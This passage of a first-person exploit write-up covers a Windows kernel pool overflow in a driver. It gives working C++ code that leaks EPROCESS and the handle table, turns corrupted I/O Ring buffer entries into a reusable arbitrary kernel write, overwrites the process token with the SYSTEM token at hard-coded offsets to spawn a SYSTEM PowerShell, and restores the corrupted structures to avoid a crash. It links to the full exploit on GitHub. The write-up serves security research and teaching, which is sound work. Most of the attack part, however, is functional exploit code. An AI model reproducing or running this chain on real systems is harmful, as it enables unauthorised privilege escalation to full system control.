The Windows kernel holds a linked list of EPROCESS objects, which store the general information about every process running within Windows. This is a very valuable target for me for a number of reasons. First, the final step of this exploit is stealing the SYSTEM token from the system EPROCESS. I then replace my own token within my EPROCESS to gain SYSTEM level privileges. To do this I need to find an EPROCESS object so I can walk the chain.
Secondly, the EPROCESS structure contains a pointer to the Handle Table for my process. This allows me to translate usermode handles into the actual kernel address for their object. This is extremely powerful because I can then use my read primitive to verify any future overflows before triggering them. It also allows me to find the location of any of my corrupted objects so I can later restore them. However, I still need to find the EPROCESS structure first.
Lucky for me, the structures involved in the management of Named Pipes save a pointer to the FILE_OBJECT they are associated with. FILE_OBJECTs also store a pointer to the EPROCESS. By following the pointer chain all the way back, I can get the address of the EPROCESS structure for my process.

The following code shows how I use my read primitive to walk this chain back and find the EPROCESS structure. Within the EPROCESS structure is a pointer to the OBJECT_TABLE or Handle Table. This table contains the mappings for user mode handles to kernel addresses for the objects.
printf("\n [*] ###### Locating EPROCESS and OBJECT_TABLE ######\n");
UINT64 FILE_OBJECT;
UINT64 EPROCESS;
exploitManager.Read(&FILE_OBJECT, dataQueueAddr - 0x10, sizeof(UINT64));
exploitManager.Read(&EPROCESS, FILE_OBJECT - 0x40, sizeof(UINT64));
printf(" [*] Found EPROCESS: %p\n", EPROCESS);
UINT64 HANDLE_TABLE;
exploitManager.Read(&HANDLE_TABLE, EPROCESS + 0x300, sizeof(UINT64));
printf(" [*] Found HANDLE_TABLE: %p\n", HANDLE_TABLE);
exploitManager.HANDLE_TABLE = HANDLE_TABLE;
The EPROCESS address will be saved for later, and I will use the Handle Table to resolve object addresses. The Handle Table is structured as a two-level table in most cases, but this depends on the number of handles within a process. In my case, the handle table will always have two levels. This means there is a level 1 table that holds pointers to a number of level 2 tables. These level 2 tables actually hold the addresses for the objects the handles reference. The following is an image showing the structure of a two-level handle table.

The following function shows how I handle the logic of walking the Handle Table to resolve a specific handle.
UINT64 ExploitManager::HandleToPointer(HANDLE iHandle)
{
// Walk the handle table to resolve a user mode handle to a kernel address
if (!HANDLE_TABLE)
{
printf(" [!] Can't Translate Handle Until HANDLE_TABLE Found!\n");
return NULL;
}
if (!TABLE_CODE)
{
Read(&TABLE_CODE, HANDLE_TABLE + 0x08, sizeof(UINT64));
if (!TABLE_CODE)
{
printf(" [!] Failed to get TABLE_CODE\n");
return NULL;
}
}
// Make sure it is a 2 level table
UINT64 tableLevel = TABLE_CODE & 3;
if (!tableLevel)
return NULL;
UINT64 l1TableBase = TABLE_CODE & ~3;
UINT64 handleIndex = (UINT64)iHandle / 4;
// Find which level 1 entry needs to be followed
UINT64 l1HandleOffset = (handleIndex / 0x100) * 0x8;
// Find the index in the level 2 table
UINT64 l2HandleOffset = (handleIndex % 0x100) * 0x10;
UINT64 l2TableBase;
Read(&l2TableBase, l1TableBase + l1HandleOffset, sizeof(UINT64));
INT64 handleEntry;
Read((UINT64*)&handleEntry, l2TableBase + l2HandleOffset, sizeof(UINT64));
// Must be a signed integer so the right shift sign-extends and fills the top bits with F
INT64 handleEntryShift = handleEntry >> 20;
UINT64 objectHeader = handleEntryShift << 4;
UINT64 fileObject = objectHeader + 0x30;
return fileObject;
}
Arbitrary Write Using Corrupted I/O Rings
With a working arbitrary read primitive, the next step is to develop a functional arbitrary write primitive. The target object I chose to use for this step is the Windows I/O Ring. I/O Rings handle routing input and output operations from files, devices, and memory and are a great target for my write primitive. The main structure for I/O Rings is called IORING_OBJECT and holds general information about a specific ring. Towards the end of the structure is a pointer to a list of pointers to IOP_MC_BUFFER_ENTRY objects. This list holds the input and output buffers for the I/O Ring. Each of these RegBuffers holds an Address pointer that points to where the raw data is either read from or written to. The following shows the structure of a normal I/O Ring.

If I am able to corrupt a pointer within this chain, I will be able to redirect the final Address pointer in the RegBuffer anywhere I want. Ideally, I would like to corrupt the IORING_OBJECT higher up the chain so that I can redirect its RegBuffers pointer to a forged RegBuffer in user mode, much like the named pipe corruption earlier. This would give me a very nice reusable write primitive.
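A user mode toy version of the pointer chain shows why redirecting the final Address pointer is equivalent to a write primitive. `ToyRing`, `ToyBufferEntry`, and `writeIntoRegisteredBuffer` are simplified stand-ins invented for this sketch; they keep only the fields the argument needs and do not reproduce the real I/O Ring API.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Stand-in for a registered buffer entry: where data goes and how much fits.
struct ToyBufferEntry {
    std::uint8_t* address;
    std::uint32_t length;
};

// Stand-in for the ring object: a table of pointers to buffer entries.
struct ToyRing {
    ToyBufferEntry** regBuffers;
    std::uint32_t regBuffersCount;
};

// Models an I/O operation that stores data into registered buffer `index`.
// The destination is whatever the entry's address field currently says.
bool writeIntoRegisteredBuffer(ToyRing& ring, std::uint32_t index,
                               const std::uint8_t* src, std::uint32_t len) {
    if (index >= ring.regBuffersCount) return false;
    ToyBufferEntry* entry = ring.regBuffers[index];
    if (entry == nullptr || len > entry->length) return false;
    std::memcpy(entry->address, src, len);
    return true;
}
```

If the entry's `address` is changed between two calls, the second call writes the same data to the new location without the ring noticing any difference.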

Unfortunately, the RegBuffers pointer is 0xb8 bytes into the IORING_OBJECT, so reaching it would require overflowing that many bytes without writing two consecutive null bytes or corrupting an important parameter. While having a read primitive would make corrupting parameters a non-concern, the null byte limitation is not something I can overcome with this approach. There are simply too many fields to overwrite, making it impossible to avoid two null bytes in a row.
//0xd0 bytes (sizeof)
struct _IORING_OBJECT // Reusable if corrupted, but too many clobbered fields
{
SHORT Type; //0x0 Clobbered Field
SHORT Size; //0x2 Clobbered Field
struct _NT_IORING_INFO UserInfo; //0x8 Clobbered Field
VOID* Section; //0x38 Clobbered Field
struct _NT_IORING_SUBMISSION_QUEUE* SubmissionQueue; //0x40 Clobbered Field
struct _MDL* CompletionQueueMdl; //0x48 Clobbered Field
struct _NT_IORING_COMPLETION_QUEUE* CompletionQueue; //0x50 Clobbered Field
ULONGLONG ViewSize; //0x58 Clobbered Field
LONG InSubmit; //0x60 Clobbered Field
ULONGLONG CompletionLock; //0x68 Clobbered Field
ULONGLONG SubmitCount; //0x70 Clobbered Field
ULONGLONG CompletionCount; //0x78 Clobbered Field
ULONGLONG CompletionWaitUntil; //0x80 Clobbered Field
struct _KEVENT CompletionEvent; //0x88 Clobbered Field
UCHAR SignalCompletionEvent; //0xa0 Clobbered Field
struct _KEVENT* CompletionUserEvent; //0xa8 Clobbered Field
ULONG RegBuffersCount; //0xb0 Clobbered Field
struct _IOP_MC_BUFFER_ENTRY** RegBuffers; //0xb8 OVERFLOW TARGET
ULONG RegFilesCount; //0xc0
VOID** RegFiles; //0xc8
};
//0x80 bytes (sizeof)
struct _IOP_MC_BUFFER_ENTRY // Safer to overflow, but not reusable
{
USHORT Type; //0x0 Clobbered Field
USHORT Reserved; //0x2 Clobbered Field
ULONG Size; //0x4 Clobbered Field
LONG ReferenceCount; //0x8 Clobbered Field
enum _IOP_MC_BUFFER_ENTRY_FLAGS Flags; //0xc Clobbered Field
struct _LIST_ENTRY GlobalDataLink; //0x10 Clobbered Field
VOID* Address; //0x20 OVERFLOW TARGET
ULONG Length; //0x28
CHAR AccessMode; //0x2c
LONG MdlRef; //0x30
struct _MDL* Mdl; //0x38
struct _KEVENT MdlRundownEvent; //0x40
ULONGLONG* PfnArray; //0x58
struct _IOP_MC_BE_PAGE_NODE PageNodes[1]; //0x60
};
However, there is still a way to get around this and achieve the same outcome. I can corrupt the IOP_MC_BUFFER_ENTRY instead. This approach only requires overflowing 0x20 bytes worth of data before reaching the Address pointer, which is much more manageable. Many of the fields being overflowed are also not crucial, meaning overwriting them with non-zero data is not a concern.
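The null constraint on such an overwrite can be checked before anything is sent. The following is a minimal user-mode sketch, not code from the exploit: `FirstWideNull` and `BuildEntryOverwrite` are hypothetical helper names, the check assumes the copy stops at the first aligned 16-bit zero, and the layout assumes a little-endian x64 machine with 0x20 bytes of filler in front of the Address field.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <optional>
#include <vector>

// Hypothetical helper: returns the byte offset of the first 16-bit zero
// (the UTF-16 terminator) in the payload, or nullopt if there is none.
// Assumption: the copy inspects aligned 16-bit units starting at offset 0.
std::optional<std::size_t> FirstWideNull(const std::vector<std::uint8_t>& payload)
{
    for (std::size_t i = 0; i + 1 < payload.size(); i += 2)
        if (payload[i] == 0 && payload[i + 1] == 0)
            return i;
    return std::nullopt;
}

// Hypothetical helper: builds the bytes that would land on the first 0x28
// bytes of an _IOP_MC_BUFFER_ENTRY: 0x20 bytes of non-zero filler covering
// the clobbered fields, followed by the new Address value (little-endian).
std::vector<std::uint8_t> BuildEntryOverwrite(std::uint64_t targetAddress)
{
    std::vector<std::uint8_t> bytes(0x28, 0xAA);
    std::memcpy(bytes.data() + 0x20, &targetAddress, sizeof(targetAddress));
    return bytes;
}
```

A target address such as 0xffffa80312345678 passes the check, while 0xffffa80300001000 is cut short at offset 0x22 because bits 16 to 31 of the address form a zero word. An address like that would have to be avoided or handled some other way.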

By overflowing the Address pointer of an IOP_MC_BUFFER_ENTRY, I effectively get a one-shot arbitrary write. This means every time I want to write data I have to do another overflow, which is not enough for my use case. Because I corrupted the named pipe linked list earlier on, I need to be able to reliably write data more than once to patch the values back in order to prevent a crash.
Fortunately, I can use this one-shot write to surgically target the **RegBuffers pointer in a different IO Ring. By pointing a write at the **RegBuffers, I no longer have to overflow 0xb8 bytes to modify the pointer. This is the approach I decided to take to achieve my arbitrary write primitive. To recap, I create 2 IO Rings. One IO Ring will have its IOP_MC_BUFFER_ENTRY corrupted by the overflow to achieve a one shot write. This one-shot write will be pointed at the IORING_OBJECT of the other IO Ring to achieve a reusable write primitive. The following shows how this exploit chain looks.
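The chain can also be modelled entirely in user mode. The following is a toy sketch, not the real kernel layouts: `ToyBufferEntry`, `ToyRing`, `ToyRingWrite`, and `ToyChain` are made-up names, and a ring "write" is reduced to a `memcpy` through `RegBuffers[0]->Address`. It follows the code in this post, where the one-shot write lands on the first slot of the array that RegBuffers points to.

```cpp
#include <cstdint>
#include <cstring>

static_assert(sizeof(void*) == 8, "the toy model assumes 64-bit pointers");

// Toy stand-ins for _IOP_MC_BUFFER_ENTRY and _IORING_OBJECT (illustrative only).
struct ToyBufferEntry { void* Address; };
struct ToyRing { ToyBufferEntry** RegBuffers; };

// Models a ring read completing into registered buffer 0: the data is copied
// to wherever RegBuffers[0]->Address points.
void ToyRingWrite(ToyRing& ring, std::uint64_t data)
{
    std::memcpy(ring.RegBuffers[0]->Address, &data, sizeof(data));
}

struct ToyChain {
    ToyBufferEntry  oneShotEntry{};                 // entry sitting after the overflowed chunk
    ToyBufferEntry* oneShotSlots[1] = { &oneShotEntry };
    ToyRing         oneShotRing{ oneShotSlots };

    ToyBufferEntry  originalEntry{};                // legitimate buffer of the second ring
    ToyBufferEntry* reusableSlots[1] = { &originalEntry };
    ToyRing         reusableRing{ reusableSlots };

    ToyBufferEntry  forgedEntry{};                  // stands in for the forged user-mode RegBuffer

    void Arm()
    {
        // Step 1 (the overflow): redirect the one-shot entry's Address at
        // slot 0 of the reusable ring's buffer table.
        oneShotEntry.Address = &reusableSlots[0];
        // Step 2: fire the one-shot ring so that slot 0 points at the forged entry.
        ToyRingWrite(oneShotRing, reinterpret_cast<std::uint64_t>(&forgedEntry));
    }

    // Step 3: every later write only retargets the forged entry. No new overflow is needed.
    void Write(void* destination, std::uint64_t data)
    {
        forgedEntry.Address = destination;
        ToyRingWrite(reusableRing, data);
    }
};
```

After `Arm()` runs once, `Write()` can be called any number of times with different destinations, which is the property needed later to patch the corrupted values back.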

One other piece to note is that I can use the read primitive to ensure the safety of any overflows from now on. To do this, I allocate a bunch of IO Rings and then use the OBJECT_TABLE to find where each IO Ring landed in the pool from its handle. I then read the data right before each of them to see if the IRP buffer I will overflow landed directly before any of them. If it did, I can overflow safely knowing that the correct object is being targeted. If not, I can spawn a process with a short name so the overflow is not triggered and try again. The following code snippet shows how I do this and how I set up the whole IO Ring write primitive.
IORingManager ioRingManager;
UINT64 reusableIORingCorruptionAddr;
UINT64 reusableIORingOriginalValue;
BYTE* ioRingData = NULL;
printf(" [*] Scanning IORings for adjacent overflow IRP\n");
// Designate a reusable IORing
exploitManager.reusableIORing = ioRingManager.CreateRing();
while (true)
{
// Ensure overflow safety by scanning adjacent chunks
std::thread IOCTLThread(SendIOCTL, hDevice, CalculateIRPSize(IORING_CHUNK_SIZE));
// Create 100 rings and see if any landed adjacent to the overflow chunk
ioRingManager.CreateRings(100);
ioRingData = exploitManager.ScanIORingforAdjacentOverflow(&ioRingManager);
if (ioRingData)
{
// Create the forged usermode reg buffer
exploitManager.CreateFakeRegBuffer(ioRingData + 0x10);
exploitManager.RemoveConsecutiveNulls(ioRingData, 0x30, 0x1);
// Get the kernel address of the target ring
UINT64 ioRingObject = exploitManager.HandleToPointer(*(HANDLE*)(exploitManager.reusableIORing));
if (!ioRingObject)
continue;
// Point the one shot write to the RegBuffer pointer in the reusable IORing
exploitManager.Read(&reusableIORingCorruptionAddr, ioRingObject + 0xb8, sizeof(UINT64));
if (!reusableIORingCorruptionAddr)
continue;
// Create overflow payload for first IORing
BYTE overflowData[0x400] = { 0 };
memset(overflowData, 0xAA, 0x50);
memcpy(overflowData + 0x10, ioRingData, 0x40);
memcpy(overflowData + 0x40, &reusableIORingCorruptionAddr, 0x8);
UINT64 payloadSize;
BYTE* payload = GenerateOverflowData(IORING_CHUNK_SIZE, overflowData, 0x48, &payloadSize);
// Send the overflow payload to corrupt the first IORing
CreateDummyProcess(payload, payloadSize);
IOCTLThread.join();
break;
}
else
{
// If the overflow is not before an IO Ring, free the rings and retry
CreateDummyProcess(NULL, 0);
IOCTLThread.join();
}
}
// Fire first IORing to corrupt the reusable one, write primitive now enabled
exploitManager.Read(&reusableIORingOriginalValue, reusableIORingCorruptionAddr, sizeof(UINT64));
TriggerIORing(ioRingManager.corruptedRing, (UINT64)exploitManager.fakeRegBuffer);
With this full chain, I am able to get a write primitive that is reusable and can access the kernel virtual address space. All I need to do is create a named pipe that will be used as the input file for the IO Ring. Windows treats named pipes just like files, so I can write my data to a named pipe instead of having to write it to disk. I then swap the Address pointer in my forged RegBuffer to my target address. From there I simply trigger the write by submitting to the IO Ring.
void ExploitManager::Write(BYTE* iDestinationAddr, UINT64 data)
{
fakeRegBuffer->Address = iDestinationAddr;
TriggerIORing(reusableIORing, data);
}
void TriggerIORing(HIORING ioRing, UINT64 data)
{
LPCSTR pipeName = "\\\\.\\pipe\\IoRingPayloadPipe";
HANDLE hReadPipe = CreateNamedPipeA(
pipeName,
PIPE_ACCESS_INBOUND | FILE_FLAG_OVERLAPPED,
PIPE_TYPE_BYTE | PIPE_WAIT,
1,
0x1000,
0x1000,
0,
NULL
);
if (hReadPipe == INVALID_HANDLE_VALUE) {
printf(" [!] Failed to create read pipe.\n");
return;
}
HANDLE hWritePipe = CreateFileA(
pipeName,
GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hWritePipe == INVALID_HANDLE_VALUE) {
printf(" [!] Failed to open write pipe.\n");
CloseHandle(hReadPipe);
return;
}
// 2. Setup and write payload
BYTE payload[8] = { 0 };
memcpy(payload, &data, 0x8);
DWORD bytesWritten = 0;
WriteFile(hWritePipe, payload, sizeof(payload), &bytesWritten, NULL);
// 3. Queue the read
IORING_HANDLE_REF fileRef = IoRingHandleRefFromHandle(hReadPipe);
IORING_BUFFER_REF bufferRef = IoRingBufferRefFromIndexAndOffset(0, 0);
HRESULT status = BuildIoRingReadFile(ioRing, fileRef, bufferRef, sizeof(payload), 0, NULL, IOSQE_FLAGS_NONE);
// 4. Submit to kernel
UINT32 submittedEntries = 0;
status = SubmitIoRing(ioRing, 1, INFINITE, &submittedEntries);
// 5. Clean up the completion queue
IORING_CQE cqe = { 0 };
HRESULT popStatus = PopIoRingCompletion(ioRing, &cqe);
// 6. Close handles to prevent leaks
CloseHandle(hWritePipe);
CloseHandle(hReadPipe);
}
With all of this handled, I now have a reusable write primitive. The next step is to employ my read and write primitives to achieve a full privilege escalation by swapping my process token.
Stealing the SYSTEM Token and Cleaning Up
Now that I have working read and write primitives, I need to use them to actually do something. For this exploit, I simply want to elevate privileges. This can be done by taking the token from the SYSTEM EPROCESS and replacing the token of my own process with it. Much more can be done with read and write primitives if wanted. In the future I plan on developing a proof of concept rootkit loader using read and write primitives.
For this exploit, however, I will stick to basic data-only attacks. To begin, I walk the EPROCESS chain until I find the process with PID 4, which is always the SYSTEM process. From there, I save the token associated with the SYSTEM process. I then simply replace my own token in my EPROCESS with the SYSTEM token. This effectively gives my process full access to everything on the system. The following code shows how I go about walking the EPROCESSes, starting with my own, which I leaked earlier.
printf("\n [*] ###### Stealing System Token ######\n");
UINT64 startEPROCESS = EPROCESS;
UINT64 currentEPROCESS = EPROCESS;
UINT64 systemToken = 0x0;
// Walk process list until system is found
while (true)
{
UINT64 pid = 0;
// Get PID value
exploitManager.Read(&pid, currentEPROCESS + 0x1d0, 0x8);
if (pid == 0x4)
{
printf(" [*] Found System Process!\n");
// Steal system Token
exploitManager.Read(&systemToken, currentEPROCESS + 0x248, 0x8);
printf(" [*] Found System Token: %p\n", systemToken);
break;
}
// Continue down the list
exploitManager.Read(&currentEPROCESS, currentEPROCESS + 0x1d8, 0x8);
currentEPROCESS -= 0x1d8;
if (currentEPROCESS == startEPROCESS)
{
printf(" [!] Searched the whole list. System process not found.\n");
break;
}
}
// Overwrite our token with system
BYTE* currentToken = (BYTE*)EPROCESS + 0x248;
printf("\n [*] Overwriting current token at %p\n", currentToken);
exploitManager.Write(currentToken, systemToken);
From this point I simply spawn an instance of PowerShell. It inherits my process's token and therefore also has SYSTEM access. From this point on PowerShell is running as NT AUTHORITY\SYSTEM and the full privilege escalation is achieved.

There is still some cleanup that needs to be done. If the user were to close the command prompt, the corrupted named pipe DQEs and I/O Rings would cause the system to crash when the kernel attempts to free them. This means I have to patch the original values back before I let the process exit. This makes sure the values all line up before the kernel attempts to free them and prevents a bluescreen. The following is how I went about doing that.
printf("\n [*] ###### Patching Corrupted Values ######\n");
// Find the location of the corrupted pipe
UINT64 corruptPipeObj = exploitManager.HandleToPointer(arbRePipes.corruptedPipe);
UINT64 corruptedPipeClientManager;
exploitManager.Read(&corruptedPipeClientManager, corruptPipeObj + 0x20, sizeof(UINT64));
corruptedPipeClientManager &= 0xfffffffffffffff0;
printf(" [*] Corrupted Pipe Address Found: %p\n", corruptedPipeClientManager);
// Restore pipe linked list killing the read primitive
printf(" [*] Restoring Corrupted Pipe\n");
UINT64 pipe1Addr;
UINT64 pipe2Addr;
UINT64 pipeLink;
UINT64 corruptedPipeRestoreValue;
exploitManager.Read(&pipe1Addr, corruptedPipeClientManager + 0x48, sizeof(UINT64));
exploitManager.Read(&pipe2Addr, corruptedPipeClientManager + 0x50, sizeof(UINT64));
exploitManager.Read(&pipeLink, pipe1Addr, sizeof(UINT64));
if (pipeLink != pipe2Addr)
{
exploitManager.Write((BYTE*)(pipe1Addr - 0x10), 0x7246704e02000000);
exploitManager.Write((BYTE*)(pipe1Addr), pipe2Addr);
}
else
{
exploitManager.Write((BYTE*)(pipe2Addr - 0x10), 0x7246704e02000000);
exploitManager.Write((BYTE*)(pipe2Addr), corruptedPipeClientManager + 0x48);
}
// -------------- Read Primitive Disabled --------------
printf(" [*] Restoring Corrupted IORings\n");
for (int i = 0; i < 0x70; i += 0x8)
exploitManager.Write((BYTE*)(ioRingManager.corruptedRingEntryAddr+i), ioRingManager.corruptedRingOriginalData[i/8]);
exploitManager.Write((BYTE*)(reusableIORingCorruptionAddr), reusableIORingOriginalValue);
Full Exploit Demo
Exploit Github: https://github.com/Kalagious/RevoDetectorExploit/tree/master
Helpful Resources
Vergilius Project: Compilation of community reverse-engineered closed-source Windows kernel structures.
https://www.vergiliusproject.com
vp777 Windows Non-Paged Pool Overflow Exploitation: Github project explaining how Named Pipes can be used for an arbitrary read primitive.
http://github.com/vp777/Windows-Non-Paged-Pool-Overflow-Exploitation/blob/master/readme.md
